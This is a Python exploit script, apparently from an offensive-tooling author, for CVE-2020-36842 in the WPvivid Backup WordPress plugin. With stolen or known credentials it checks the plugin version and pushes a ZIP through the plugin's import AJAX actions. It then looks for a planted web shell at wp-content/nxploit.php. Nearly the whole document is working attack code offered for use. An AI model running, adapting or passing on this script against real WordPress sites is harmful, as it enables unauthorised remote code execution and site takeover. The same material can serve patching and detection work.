import requests import os import time import argparse #by Khaled alenazi Nxploit requests.packages.urllib3.disable_warnings() # Disable SSL verification session = requests.Session() session.verify = False parser = argparse.ArgumentParser(description="CVE-2020-36842 - WPvivid Plugin Arbitrary File Upload Vulnerability") parser.add_argument("-u", required=True, help="Target WordPress site URL") parser.add_argument("-un", required=True, help="WordPress username") parser.add_argument("-p", required=True, help="WordPress password") args = parser.parse_args() def check_version(url): version_url = url + "/wp-content/plugins/wpvivid-backuprestore/readme.txt" try: response = session.get(version_url, timeout=10) if "Stable tag: 0.9.35" in response.text or "Stable tag: 0.9.3" in response.text: print("[+] Target is vulnerable. Proceeding with exploitation.") else: print("[!] Target is not vulnerable.") exit() except requests.RequestException as e: print(f"[!] Version check error: {e}") exit() def login(url, username, password): login_url = url + "/wp-login.php" login_data = { "log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In" } headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"} try: response = session.post(login_url, data=login_data, headers=headers, timeout=10) response.raise_for_status() except requests.RequestException as e: print(f"[!] Login error: {e}") exit() if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): print("[+] Logged in successfully.") else: print("[!] Login failed.") exit() def find_zip_file(): files_in_dir = [f for f in os.listdir('.') if f.endswith('.zip')] if not files_in_dir: print("[!] No ZIP file found in the current directory.") exit() return files_in_dir[0] def send_request(data, files=None, retries=3): for attempt in range(retries): try: response = session.post(TARGET_URL, data=data, files=files, timeout=10) response.raise_for_status() return response.text except requests.RequestException as e: print(f"[!] Request error (Attempt {attempt+1}/{retries}): {e}") time.sleep(3) return "[!] All attempts failed." def main(): check_version(args.u) login(args.u, args.un, args.p) file_path = find_zip_file() print(f"[+] Found file: {file_path}") files = {"async-upload": (file_path, open(file_path, "rb"), "application/zip")} data = {"name": file_path, "chunk": "0", "chunks": "1", "action": "wpvivid_upload_import_files"} print("[+] Uploading file: ", send_request(data, files)) time.sleep(5) check_file_data = {"action": "wpvivid_check_import_file", "file_name": file_path} print("[+] Checking file: ", send_request(check_file_data)) time.sleep(5) upload_complete_data = { "action": "wpvivid_upload_import_file_complete", "files": f"[{{\"id\":\"o_1ilg3pu22185h1r7gvmorasib37\",\"name\":\"{file_path}\",\"type\":\"application/zip\",\"size\":2342,\"origSize\":2342,\"loaded\":2342,\"percent\":100,\"status\":5,\"lastModifiedDate\":\"3/4/2025, 3:19:23 AM\"}}]", } print("[+] Confirming upload: ", send_request(upload_complete_data)) time.sleep(5) start_import_data = {"action": "wpvivid_start_import", "file_name": file_path, "user": "1"} print("[+] Starting import: ", send_request(start_import_data)) time.sleep(5) progress_data = {"action": "wpvivid_get_import_progress"} print("[+] Import progress: ", send_request(progress_data)) # Check for shell shell_url = args.u + "/wp-content/nxploit.php" try: response = session.get(shell_url, timeout=10) if response.status_code == 200: print("[+] Shell uploaded successfully at:", shell_url) else: print("[!] Shell not found.") except requests.RequestException as e: print(f"[!] Shell check error: {e}") if __name__ == "__main__": TARGET_URL = args.u + "/wp-admin/admin-ajax.php" main()